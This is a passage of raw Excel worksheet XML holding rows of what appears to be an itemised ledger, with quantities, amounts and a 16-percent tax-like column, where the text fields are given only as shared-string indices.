        <v>2352.1408</v>
      </c>
      <c r="K1560" s="16"/>
    </row>
    <row r="1561" spans="2:11">
      <c r="B1561" s="9">
        <v>1595</v>
      </c>
      <c r="C1561" s="238" t="s">
        <v>8968</v>
      </c>
      <c r="D1561" s="238" t="s">
        <v>8969</v>
      </c>
      <c r="E1561" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1561" s="238" t="s">
        <v>456</v>
      </c>
      <c r="G1561" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1561" s="10">
        <v>2</v>
      </c>
      <c r="I1561" s="14">
        <v>7179.49</v>
      </c>
      <c r="J1561" s="15">
        <v>1148.72</v>
      </c>
      <c r="K1561" s="16"/>
    </row>
    <row r="1562" spans="2:11">
      <c r="B1562" s="9">
        <v>1596</v>
      </c>
      <c r="C1562" s="238" t="s">
        <v>8970</v>
      </c>
      <c r="D1562" s="238" t="s">
        <v>8971</v>
      </c>
      <c r="E1562" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1562" s="238" t="s">
        <v>8972</v>
      </c>
      <c r="G1562" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1562" s="10">
        <v>5</v>
      </c>
      <c r="I1562" s="14">
        <v>13297.97</v>
      </c>
      <c r="J1562" s="15">
        <v>2127.672</v>
      </c>
      <c r="K1562" s="16"/>
    </row>
    <row r="1563" spans="2:11">
      <c r="B1563" s="9">
        <v>1597</v>
      </c>
      <c r="C1563" s="238" t="s">
        <v>8973</v>
      </c>
      <c r="D1563" s="238" t="s">
        <v>8974</v>
      </c>
      <c r="E1563" s="238" t="s">
        <v>8975</v>
      </c>
      <c r="F1563" s="238" t="s">
        <v>8972</v>
      </c>
      <c r="G1563" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1563" s="10">
        <v>1</v>
      </c>
      <c r="I1563" s="14">
        <v>10683.76</v>
      </c>
      <c r="J1563" s="15">
        <v>1709.4016</v>
      </c>
      <c r="K1563" s="16"/>
    </row>
    <row r="1564" spans="2:11">
      <c r="B1564" s="9">
        <v>1598</v>
      </c>
      <c r="C1564" s="238" t="s">
        <v>8976</v>
      </c>
      <c r="D1564" s="238" t="s">
        <v>8409</v>
      </c>
      <c r="E1564" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1564" s="238" t="s">
        <v>8977</v>
      </c>
      <c r="G1564" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1564" s="10">
        <v>2</v>
      </c>
      <c r="I1564" s="14">
        <v>1059.83</v>
      </c>
      <c r="J1564" s="15">
        <v>169.5744</v>
      </c>
      <c r="K1564" s="16"/>
    </row>
    <row r="1565" spans="2:11">
      <c r="B1565" s="9">
        <v>1599</v>
      </c>
      <c r="C1565" s="238" t="s">
        <v>8978</v>
      </c>
      <c r="D1565" s="238" t="s">
        <v>8979</v>
      </c>
      <c r="E1565" s="238" t="s">
        <v>8980</v>
      </c>
      <c r="F1565" s="238" t="s">
        <v>1084</v>
      </c>
      <c r="G1565" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1565" s="10">
        <v>1</v>
      </c>
      <c r="I1565" s="14">
        <v>6239.32</v>
      </c>
      <c r="J1565" s="15">
        <v>998.2912</v>
      </c>
      <c r="K1565" s="16"/>
    </row>
    <row r="1566" spans="2:11">
      <c r="B1566" s="9">
        <v>1600</v>
      </c>
      <c r="C1566" s="238" t="s">
        <v>8981</v>
      </c>
      <c r="D1566" s="238" t="s">
        <v>8982</v>
      </c>
      <c r="E1566" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1566" s="238" t="s">
        <v>1084</v>
      </c>
      <c r="G1566" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1566" s="10">
        <v>2</v>
      </c>
      <c r="I1566" s="14">
        <v>2564.1</v>
      </c>
      <c r="J1566" s="15">
        <v>410.256</v>
      </c>
      <c r="K1566" s="16"/>
    </row>
    <row r="1567" spans="2:11">
      <c r="B1567" s="9">
        <v>1601</v>
      </c>
      <c r="C1567" s="238" t="s">
        <v>8983</v>
      </c>
      <c r="D1567" s="238" t="s">
        <v>8984</v>
      </c>
      <c r="E1567" s="238" t="s">
        <v>8985</v>
      </c>
      <c r="F1567" s="238" t="s">
        <v>1084</v>
      </c>
      <c r="G1567" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1567" s="10">
        <v>1</v>
      </c>
      <c r="I1567" s="14">
        <v>5299.15</v>
      </c>
      <c r="J1567" s="15">
        <v>847.864</v>
      </c>
      <c r="K1567" s="16"/>
    </row>
    <row r="1568" spans="2:11">
      <c r="B1568" s="9">
        <v>1602</v>
      </c>
      <c r="C1568" s="238" t="s">
        <v>8986</v>
      </c>
      <c r="D1568" s="238" t="s">
        <v>8984</v>
      </c>
      <c r="E1568" s="238" t="s">
        <v>8987</v>
      </c>
      <c r="F1568" s="238" t="s">
        <v>1084</v>
      </c>
      <c r="G1568" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1568" s="10">
        <v>1</v>
      </c>
      <c r="I1568" s="14">
        <v>5641.03</v>
      </c>
      <c r="J1568" s="15">
        <v>902.5648</v>
      </c>
      <c r="K1568" s="16"/>
    </row>
    <row r="1569" spans="2:11">
      <c r="B1569" s="9">
        <v>1603</v>
      </c>
      <c r="C1569" s="238" t="s">
        <v>8988</v>
      </c>
      <c r="D1569" s="238" t="s">
        <v>8989</v>
      </c>
      <c r="E1569" s="238" t="s">
        <v>8990</v>
      </c>
      <c r="F1569" s="238" t="s">
        <v>1084</v>
      </c>
      <c r="G1569" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1569" s="10">
        <v>1</v>
      </c>
      <c r="I1569" s="14">
        <v>529.91</v>
      </c>
      <c r="J1569" s="15">
        <v>84.7856</v>
      </c>
      <c r="K1569" s="16"/>
    </row>
    <row r="1570" spans="2:11">
      <c r="B1570" s="9">
        <v>1604</v>
      </c>
      <c r="C1570" s="238" t="s">
        <v>8991</v>
      </c>
      <c r="D1570" s="238" t="s">
        <v>8989</v>
      </c>
      <c r="E1570" s="238" t="s">
        <v>8992</v>
      </c>
      <c r="F1570" s="238" t="s">
        <v>1084</v>
      </c>
      <c r="G1570" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1570" s="10">
        <v>1</v>
      </c>
      <c r="I1570" s="14">
        <v>598.29</v>
      </c>
      <c r="J1570" s="15">
        <v>95.7264</v>
      </c>
      <c r="K1570" s="16"/>
    </row>
    <row r="1571" spans="2:11">
      <c r="B1571" s="9">
        <v>1605</v>
      </c>
      <c r="C1571" s="238" t="s">
        <v>8993</v>
      </c>
      <c r="D1571" s="238" t="s">
        <v>8994</v>
      </c>
      <c r="E1571" s="238" t="s">
        <v>5197</v>
      </c>
      <c r="F1571" s="238" t="s">
        <v>1084</v>
      </c>
      <c r="G1571" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1571" s="10">
        <v>1</v>
      </c>
      <c r="I1571" s="14">
        <v>478.63</v>
      </c>
      <c r="J1571" s="15">
        <v>76.5808</v>
      </c>
      <c r="K1571" s="16"/>
    </row>
    <row r="1572" spans="2:11">
      <c r="B1572" s="9">
        <v>1606</v>
      </c>
      <c r="C1572" s="238" t="s">
        <v>8995</v>
      </c>
      <c r="D1572" s="238" t="s">
        <v>8996</v>
      </c>
      <c r="E1572" s="238" t="s">
        <v>8997</v>
      </c>
      <c r="F1572" s="238" t="s">
        <v>1084</v>
      </c>
      <c r="G1572" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1572" s="10">
        <v>10</v>
      </c>
      <c r="I1572" s="14">
        <v>512.82</v>
      </c>
      <c r="J1572" s="15">
        <v>82.048</v>
      </c>
      <c r="K1572" s="16"/>
    </row>
    <row r="1573" spans="2:11">
      <c r="B1573" s="9">
        <v>1607</v>
      </c>
      <c r="C1573" s="238" t="s">
        <v>8998</v>
      </c>
      <c r="D1573" s="238" t="s">
        <v>8999</v>
      </c>
      <c r="E1573" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1573" s="238" t="s">
        <v>9000</v>
      </c>
      <c r="G1573" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1573" s="10">
        <v>1</v>
      </c>
      <c r="I1573" s="14">
        <v>1213.68</v>
      </c>
      <c r="J1573" s="15">
        <v>194.1888</v>
      </c>
      <c r="K1573" s="16"/>
    </row>
    <row r="1574" spans="2:11">
      <c r="B1574" s="9">
        <v>1608</v>
      </c>
      <c r="C1574" s="238" t="s">
        <v>9001</v>
      </c>
      <c r="D1574" s="238" t="s">
        <v>9002</v>
      </c>
      <c r="E1574" s="238" t="s">
        <v>8459</v>
      </c>
      <c r="F1574" s="238" t="s">
        <v>9003</v>
      </c>
      <c r="G1574" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1574" s="10">
        <v>5</v>
      </c>
      <c r="I1574" s="14">
        <v>1160</v>
      </c>
      <c r="J1574" s="15">
        <v>185.6</v>
      </c>
      <c r="K1574" s="16"/>
    </row>
    <row r="1575" spans="2:11">
      <c r="B1575" s="9">
        <v>1609</v>
      </c>
      <c r="C1575" s="238" t="s">
        <v>9004</v>
      </c>
      <c r="D1575" s="9"/>
      <c r="E1575" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1575" s="9"/>
      <c r="G1575" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1575" s="10">
        <v>1</v>
      </c>
      <c r="I1575" s="14">
        <v>1786.32</v>
      </c>
      <c r="J1575" s="15">
        <v>285.8112</v>
      </c>
      <c r="K1575" s="16"/>
    </row>
    <row r="1576" spans="2:11">
      <c r="B1576" s="9">
        <v>1610</v>
      </c>
      <c r="C1576" s="238" t="s">
        <v>9005</v>
      </c>
      <c r="D1576" s="238" t="s">
        <v>9006</v>
      </c>
      <c r="E1576" s="238" t="s">
        <v>7366</v>
      </c>
      <c r="F1576" s="238" t="s">
        <v>9007</v>
      </c>
      <c r="G1576" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1576" s="10">
        <v>3</v>
      </c>
      <c r="I1576" s="14">
        <v>153.85</v>
      </c>
      <c r="J1576" s="15">
        <v>24.6144</v>
      </c>
      <c r="K1576" s="16"/>
    </row>
    <row r="1577" spans="2:11">
      <c r="B1577" s="9">
        <v>1611</v>
      </c>
      <c r="C1577" s="238" t="s">
        <v>9008</v>
      </c>
      <c r="D1577" s="238" t="s">
        <v>9009</v>
      </c>
      <c r="E1577" s="238" t="s">
        <v>6224</v>
      </c>
      <c r="F1577" s="238" t="s">
        <v>9010</v>
      </c>
      <c r="G1577" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1577" s="10">
        <v>7</v>
      </c>
      <c r="I1577" s="14">
        <v>1496.44</v>
      </c>
      <c r="J1577" s="15">
        <v>239.4336</v>
      </c>
      <c r="K1577" s="16"/>
    </row>
    <row r="1578" spans="2:11">
      <c r="B1578" s="9">
        <v>1612</v>
      </c>
      <c r="C1578" s="238" t="s">
        <v>9011</v>
      </c>
      <c r="D1578" s="238" t="s">
        <v>9012</v>
      </c>
      <c r="E1578" s="238" t="s">
        <v>9013</v>
      </c>
      <c r="F1578" s="238" t="s">
        <v>9014</v>
      </c>
      <c r="G1578" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1578" s="10">
        <v>6</v>
      </c>
      <c r="I1578" s="14">
        <v>211</v>
      </c>
      <c r="J1578" s="15">
        <v>33.7632</v>
      </c>
      <c r="K1578" s="16"/>
    </row>
    <row r="1579" spans="2:11">
      <c r="B1579" s="9">
        <v>1613</v>
      </c>
      <c r="C1579" s="238" t="s">
        <v>9015</v>
      </c>
      <c r="D1579" s="238" t="s">
        <v>9016</v>
      </c>
      <c r="E1579" s="238" t="s">
        <v>9013</v>
      </c>
      <c r="F1579" s="238" t="s">
        <v>9017</v>
      </c>
      <c r="G1579" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1579" s="10">
        <v>6</v>
      </c>
      <c r="I1579" s="14">
        <v>255</v>
      </c>
      <c r="J1579" s="15">
        <v>40.8</v>
      </c>
      <c r="K1579" s="16"/>
    </row>
    <row r="1580" spans="2:11">
      <c r="B1580" s="9">
        <v>1614</v>
      </c>
      <c r="C1580" s="238" t="s">
        <v>9018</v>
      </c>
      <c r="D1580" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E1580" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1580" s="9"/>
      <c r="G1580" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1580" s="10">
        <v>24</v>
      </c>
      <c r="I1580" s="14">
        <v>101.52</v>
      </c>
      <c r="J1580" s="15">
        <v>16.2432</v>
      </c>
      <c r="K1580" s="16"/>
    </row>
    <row r="1581" spans="2:11">
      <c r="B1581" s="9">
        <v>1615</v>
      </c>
      <c r="C1581" s="238" t="s">
        <v>9019</v>
      </c>
      <c r="D1581" s="238" t="s">
        <v>9020</v>
      </c>
      <c r="E1581" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1581" s="238" t="s">
        <v>9021</v>
      </c>
      <c r="G1581" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1581" s="10">
        <v>13</v>
      </c>
      <c r="I1581" s="14">
        <v>301</v>
      </c>
      <c r="J1581" s="15">
        <v>48.152</v>
      </c>
      <c r="K1581" s="16"/>
    </row>
    <row r="1582" spans="2:11">
      <c r="B1582" s="9">
        <v>1616</v>
      </c>
      <c r="C1582" s="238" t="s">
        <v>9022</v>
      </c>
      <c r="D1582" s="238" t="s">
        <v>9023</v>
      </c>
      <c r="E1582" s="238" t="s">
        <v>9024</v>
      </c>
      <c r="F1582" s="238" t="s">
        <v>9025</v>
      </c>
      <c r="G1582" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1582" s="10">
        <v>3</v>
      </c>
      <c r="I1582" s="14">
        <v>457</v>
      </c>
      <c r="J1582" s="15">
        <v>73.1184</v>
      </c>
      <c r="K1582" s="16"/>
    </row>
    <row r="1583" spans="2:11">
      <c r="B1583" s="9">
        <v>1617</v>
      </c>
      <c r="C1583" s="238" t="s">
        <v>9026</v>
      </c>
      <c r="D1583" s="238" t="s">
        <v>9027</v>
      </c>
      <c r="E1583" s="238" t="s">
        <v>5373</v>
      </c>
      <c r="F1583" s="238" t="s">
        <v>9028</v>
      </c>
      <c r="G1583" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1583" s="10">
        <v>6</v>
      </c>
      <c r="I1583" s="14">
        <v>287</v>
      </c>
      <c r="J1583" s="15">
        <v>45.9168</v>
      </c>
      <c r="K1583" s="16"/>
    </row>
    <row r="1584" spans="2:11">
      <c r="B1584" s="9">
        <v>1618</v>
      </c>
      <c r="C1584" s="238" t="s">
        <v>9029</v>
      </c>
      <c r="D1584" s="238" t="s">
        <v>9030</v>
      </c>
      <c r="E1584" s="238" t="s">
        <v>9013</v>
      </c>
      <c r="F1584" s="238" t="s">
        <v>9031</v>
      </c>
      <c r="G1584" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1584" s="10">
        <v>30</v>
      </c>
      <c r="I1584" s="14">
        <v>776</v>
      </c>
      <c r="J1584" s="15">
        <v>124.176</v>
      </c>
      <c r="K1584" s="16"/>
    </row>
    <row r="1585" spans="2:11">
      <c r="B1585" s="9">
        <v>1619</v>
      </c>
      <c r="C1585" s="238" t="s">
        <v>9032</v>
      </c>
      <c r="D1585" s="238" t="s">
        <v>9033</v>
      </c>
      <c r="E1585" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1585" s="238" t="s">
        <v>9034</v>
      </c>
      <c r="G1585" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1585" s="10">
        <v>25</v>
      </c>
      <c r="I1585" s="14">
        <v>678</v>
      </c>
      <c r="J1585" s="15">
        <v>108.48</v>
      </c>
      <c r="K1585" s="16"/>
    </row>
    <row r="1586" spans="2:11">
      <c r="B1586" s="9">
        <v>1620</v>
      </c>
      <c r="C1586" s="238" t="s">
        <v>9035</v>
      </c>
      <c r="D1586" s="238" t="s">
        <v>9036</v>
      </c>
      <c r="E1586" s="238" t="s">
        <v>9013</v>
      </c>
      <c r="F1586" s="238" t="s">
        <v>9037</v>
      </c>
      <c r="G1586" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1586" s="10">
        <v>19</v>
      </c>
      <c r="I1586" s="14">
        <v>548</v>
      </c>
      <c r="J1586" s="15">
        <v>87.6736</v>
      </c>
      <c r="K1586" s="16"/>
    </row>
    <row r="1587" spans="2:11">
      <c r="B1587" s="9">
        <v>1621</v>
      </c>
      <c r="C1587" s="238" t="s">
        <v>9038</v>
      </c>
      <c r="D1587" s="238" t="s">
        <v>9039</v>
      </c>
      <c r="E1587" s="238" t="s">
        <v>9040</v>
      </c>
      <c r="F1587" s="9"/>
      <c r="G1587" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1587" s="10">
        <v>1</v>
      </c>
      <c r="I1587" s="14">
        <v>239.32</v>
      </c>
      <c r="J1587" s="15">
        <v>38.2912</v>
      </c>
      <c r="K1587" s="16"/>
    </row>
    <row r="1588" spans="2:11">
      <c r="B1588" s="9">
        <v>1622</v>
      </c>
      <c r="C1588" s="238" t="s">
        <v>9041</v>
      </c>
      <c r="D1588" s="238" t="s">
        <v>9039</v>
      </c>
      <c r="E1588" s="238" t="s">
        <v>9040</v>
      </c>
      <c r="F1588" s="238" t="s">
        <v>9042</v>
      </c>
      <c r="G1588" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H1588" s="10">
        <v>7</v>
      </c>
      <c r="I1588" s="14">
        <v>1495.71</v>
      </c>
      <c r="J1588" s="15">
        <v>239.3104</v>
      </c>
      <c r="K1588" s="16"/>
    </row>
    <row r="1589" spans="2:11">
      <c r="B1589" s="9">
        <v>1623</v>
      </c>
      <c r="C1589" s="238" t="s">
        <v>9043</v>
      </c>
      <c r="D1589" s="238" t="s">
        <v>9044</v>
      </c>
      <c r="E1589" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F1589" s="238" t="s">
        <v>9045</v>
      </c>
      <c r="G1589" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1589" s="10">
        <v>1</v>
      </c>
      <c r="I1589" s="14">
        <v>126.53</v>
      </c>
      <c r="J1589" s="15">
        <v>20.2448</v>
      </c>
      <c r="K1589" s="16"/>
    </row>
    <row r="1590" spans="2:11">
      <c r="B1590" s="9">
        <v>1624</v>
      </c>
      <c r="C1590" s="238" t="s">
        <v>9046</v>
      </c>
      <c r="D1590" s="238" t="s">
        <v>9047</v>
      </c>
      <c r="E1590" s="238" t="s">
        <v>6810</v>
      </c>
      <c r="F1590" s="238" t="s">
        <v>9048</v>
      </c>
      <c r="G1590" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1590" s="10">
        <v>152</v>
      </c>
      <c r="I1590" s="14">
        <v>3897.45</v>
      </c>
      <c r="J1590" s="15">
        <v>623.5648</v>
      </c>
      <c r="K1590" s="16"/>
    </row>
    <row r="1591" spans="2:11">
      <c r="B1591" s="9">
        <v>1625</v>
      </c>
      <c r="C1591" s="238" t="s">
        <v>9049</v>
      </c>
      <c r="D1591" s="238" t="s">
        <v>9050</v>
      </c>
      <c r="E1591" s="238" t="s">
        <v>6224</v>
      </c>
      <c r="F1591" s="238" t="s">
        <v>9051</v>
      </c>
      <c r="G1591" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1591" s="10">
        <v>6</v>
      </c>
      <c r="I1591" s="14">
        <v>1076.92</v>
      </c>
      <c r="J1591" s="15">
        <v>172.3104</v>
      </c>
      <c r="K1591" s="16"/>
    </row>
    <row r="1592" spans="2:11">
      <c r="B1592" s="9">
        <v>1626</v>
      </c>
      <c r="C1592" s="238" t="s">
        <v>9052</v>
      </c>
      <c r="D1592" s="238" t="s">
        <v>9053</v>
      </c>
      <c r="E1592" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1592" s="238" t="s">
        <v>9054</v>
      </c>
      <c r="G1592" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1592" s="10">
        <v>55</v>
      </c>
      <c r="I1592" s="14">
        <v>1176.16</v>
      </c>
      <c r="J1592" s="15">
        <v>188.144</v>
      </c>
      <c r="K1592" s="16"/>
    </row>
    <row r="1593" spans="2:11">
      <c r="B1593" s="9">
        <v>1627</v>
      </c>
      <c r="C1593" s="238" t="s">
        <v>9055</v>
      </c>
      <c r="D1593" s="238" t="s">
        <v>9056</v>
      </c>
      <c r="E1593" s="238" t="s">
        <v>8445</v>
      </c>
      <c r="F1593" s="238" t="s">
        <v>9057</v>
      </c>
      <c r="G1593" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1593" s="10">
        <v>4</v>
      </c>
      <c r="I1593" s="14">
        <v>156</v>
      </c>
      <c r="J1593" s="15">
        <v>24.96</v>
      </c>
      <c r="K1593" s="16"/>
    </row>
    <row r="1594" spans="2:11">
      <c r="B1594" s="9">
        <v>1628</v>
      </c>
      <c r="C1594" s="238" t="s">
        <v>9058</v>
      </c>
      <c r="D1594" s="238" t="s">
        <v>9059</v>
      </c>
      <c r="E1594" s="238" t="s">
        <v>9060</v>
      </c>
      <c r="F1594" s="238" t="s">
        <v>9061</v>
      </c>
      <c r="G1594" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1594" s="10">
        <v>9</v>
      </c>
      <c r="I1594" s="14">
        <v>170.78</v>
      </c>
      <c r="J1594" s="15">
        <v>27.3312</v>
      </c>
      <c r="K1594" s="16"/>
    </row>
    <row r="1595" spans="2:11">
      <c r="B1595" s="9">
        <v>1629</v>
      </c>
      <c r="C1595" s="238" t="s">
        <v>9062</v>
      </c>
      <c r="D1595" s="238" t="s">
        <v>9063</v>
      </c>
      <c r="E1595" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1595" s="238" t="s">
        <v>9064</v>
      </c>
      <c r="G1595" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1595" s="10">
        <v>21</v>
      </c>
      <c r="I1595" s="14">
        <v>441.71</v>
      </c>
      <c r="J1595" s="15">
        <v>70.6608</v>
      </c>
      <c r="K1595" s="16"/>
    </row>
    <row r="1596" spans="2:11">
      <c r="B1596" s="9">
        <v>1630</v>
      </c>
      <c r="C1596" s="238" t="s">
        <v>9065</v>
      </c>
      <c r="D1596" s="238" t="s">
        <v>9066</v>
      </c>
      <c r="E1596" s="238" t="s">
        <v>9067</v>
      </c>
      <c r="F1596" s="238" t="s">
        <v>9068</v>
      </c>
      <c r="G1596" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1596" s="10">
        <v>3</v>
      </c>
      <c r="I1596" s="14">
        <v>589.74</v>
      </c>
      <c r="J1596" s="15">
        <v>94.3584</v>
      </c>
      <c r="K1596" s="16"/>
    </row>
    <row r="1597" spans="2:11">
      <c r="B1597" s="9">
        <v>1631</v>
      </c>
      <c r="C1597" s="238" t="s">
        <v>9069</v>
      </c>
      <c r="D1597" s="238" t="s">
        <v>9070</v>
      </c>
      <c r="E1597" s="238" t="s">
        <v>5346</v>
      </c>
      <c r="F1597" s="238" t="s">
        <v>9071</v>
      </c>
      <c r="G1597" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1597" s="10">
        <v>3</v>
      </c>
      <c r="I1597" s="14">
        <v>461.54</v>
      </c>
      <c r="J1597" s="15">
        <v>73.848</v>
      </c>
      <c r="K1597" s="16"/>
    </row>
    <row r="1598" spans="2:11">
      <c r="B1598" s="9">
        <v>1632</v>
      </c>
      <c r="C1598" s="238" t="s">
        <v>9072</v>
      </c>
      <c r="D1598" s="238" t="s">
        <v>9073</v>
      </c>
      <c r="E1598" s="238" t="s">
        <v>7519</v>
      </c>
      <c r="F1598" s="238" t="s">
        <v>9074</v>
      </c>
      <c r="G1598" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1598" s="10">
        <v>3</v>
      </c>
      <c r="I1598" s="14">
        <v>2576.91</v>
      </c>
      <c r="J1598" s="15">
        <v>412.3056</v>
      </c>
      <c r="K1598" s="16"/>
    </row>
    <row r="1599" spans="2:11">
      <c r="B1599" s="9">
        <v>1633</v>
      </c>
      <c r="C1599" s="238" t="s">
        <v>9075</v>
      </c>
      <c r="D1599" s="238" t="s">
        <v>6712</v>
      </c>
      <c r="E1599" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1599" s="9"/>
      <c r="G1599" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1599" s="10">
        <v>6</v>
      </c>
      <c r="I1599" s="14">
        <v>110.25</v>
      </c>
      <c r="J1599" s="15">
        <v>17.6448</v>
      </c>
      <c r="K1599" s="16"/>
    </row>
    <row r="1600" spans="2:11">
      <c r="B1600" s="9">
        <v>1634</v>
      </c>
      <c r="C1600" s="238" t="s">
        <v>9076</v>
      </c>
      <c r="D1600" s="238" t="s">
        <v>9077</v>
      </c>
      <c r="E1600" s="238" t="s">
        <v>5318</v>
      </c>
      <c r="F1600" s="238" t="s">
        <v>9078</v>
      </c>
      <c r="G1600" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1600" s="10">
        <v>5</v>
      </c>
      <c r="I1600" s="14">
        <v>128.21</v>
      </c>
      <c r="J1600" s="15">
        <v>20.512</v>
      </c>
      <c r="K1600" s="16"/>
    </row>
    <row r="1601" spans="2:11">
      <c r="B1601" s="9">
        <v>1635</v>
      </c>
      <c r="C1601" s="238" t="s">
        <v>9079</v>
      </c>
      <c r="D1601" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E1601" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1601" s="9"/>
      <c r="G1601" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1601" s="10">
        <v>44</v>
      </c>
      <c r="I1601" s="14">
        <v>207.63</v>
      </c>
      <c r="J1601" s="15">
        <v>33.2288</v>
      </c>
      <c r="K1601" s="16"/>
    </row>
    <row r="1602" spans="2:11">
      <c r="B1602" s="9">
        <v>1636</v>
      </c>
      <c r="C1602" s="238" t="s">
        <v>9080</v>
      </c>
      <c r="D1602" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E1602" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1602" s="9"/>
      <c r="G1602" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1602" s="10">
        <v>154</v>
      </c>
      <c r="I1602" s="14">
        <v>209.04</v>
      </c>
      <c r="J1602" s="15">
        <v>33.5104</v>
      </c>
      <c r="K1602" s="16"/>
    </row>
    <row r="1603" spans="2:11">
      <c r="B1603" s="9">
        <v>1637</v>
      </c>
      <c r="C1603" s="238" t="s">
        <v>9081</v>
      </c>
      <c r="D1603" s="238" t="s">
        <v>9082</v>
      </c>
      <c r="E1603" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F1603" s="238" t="s">
        <v>9083</v>
      </c>
      <c r="G1603" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1603" s="10">
        <v>2</v>
      </c>
      <c r="I1603" s="14">
        <v>5982.92</v>
      </c>
      <c r="J1603" s="15">
        <v>957.2672</v>
      </c>
      <c r="K1603" s="16"/>
    </row>
    <row r="1604" spans="2:11">
      <c r="B1604" s="9">
        <v>1638</v>
      </c>
      <c r="C1604" s="238" t="s">
        <v>9084</v>
      </c>
      <c r="D1604" s="238" t="s">
        <v>9085</v>
      </c>
      <c r="E1604" s="238" t="s">
        <v>8570</v>
      </c>
      <c r="F1604" s="238" t="s">
        <v>9086</v>
      </c>
      <c r="G1604" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1604" s="10">
        <v>82</v>
      </c>
      <c r="I1604" s="14">
        <v>4760.64</v>
      </c>
      <c r="J1604" s="15">
        <v>761.7472</v>
      </c>
      <c r="K1604" s="16"/>
    </row>
    <row r="1605" spans="2:11">
      <c r="B1605" s="9">
        <v>1639</v>
      </c>
      <c r="C1605" s="238" t="s">
        <v>9087</v>
      </c>
      <c r="D1605" s="238" t="s">
        <v>9088</v>
      </c>
      <c r="E1605" s="238" t="s">
        <v>8445</v>
      </c>
      <c r="F1605" s="238" t="s">
        <v>9089</v>
      </c>
      <c r="G1605" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1605" s="10">
        <v>17</v>
      </c>
      <c r="I1605" s="14">
        <v>1257.65</v>
      </c>
      <c r="J1605" s="15">
        <v>201.2256</v>
      </c>
      <c r="K1605" s="16"/>
    </row>
    <row r="1606" spans="2:11">
      <c r="B1606" s="9">
        <v>1640</v>
      </c>
      <c r="C1606" s="238" t="s">
        <v>9090</v>
      </c>
      <c r="D1606" s="238" t="s">
        <v>9091</v>
      </c>
      <c r="E1606" s="238" t="s">
        <v>6224</v>
      </c>
      <c r="F1606" s="238" t="s">
        <v>9092</v>
      </c>
      <c r="G1606" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1606" s="10">
        <v>16</v>
      </c>
      <c r="I1606" s="14">
        <v>2119.65</v>
      </c>
      <c r="J1606" s="15">
        <v>339.1488</v>
      </c>
      <c r="K1606" s="16"/>
    </row>
    <row r="1607" spans="2:11">
      <c r="B1607" s="9">
        <v>1641</v>
      </c>
      <c r="C1607" s="238" t="s">
        <v>9093</v>
      </c>
      <c r="D1607" s="238" t="s">
        <v>9094</v>
      </c>
      <c r="E1607" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1607" s="238" t="s">
        <v>9095</v>
      </c>
      <c r="G1607" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1607" s="10">
        <v>100</v>
      </c>
      <c r="I1607" s="14">
        <v>3418.8</v>
      </c>
      <c r="J1607" s="15">
        <v>547.04</v>
      </c>
      <c r="K1607" s="16"/>
    </row>
    <row r="1608" spans="2:11">
      <c r="B1608" s="9">
        <v>1642</v>
      </c>
      <c r="C1608" s="238" t="s">
        <v>9096</v>
      </c>
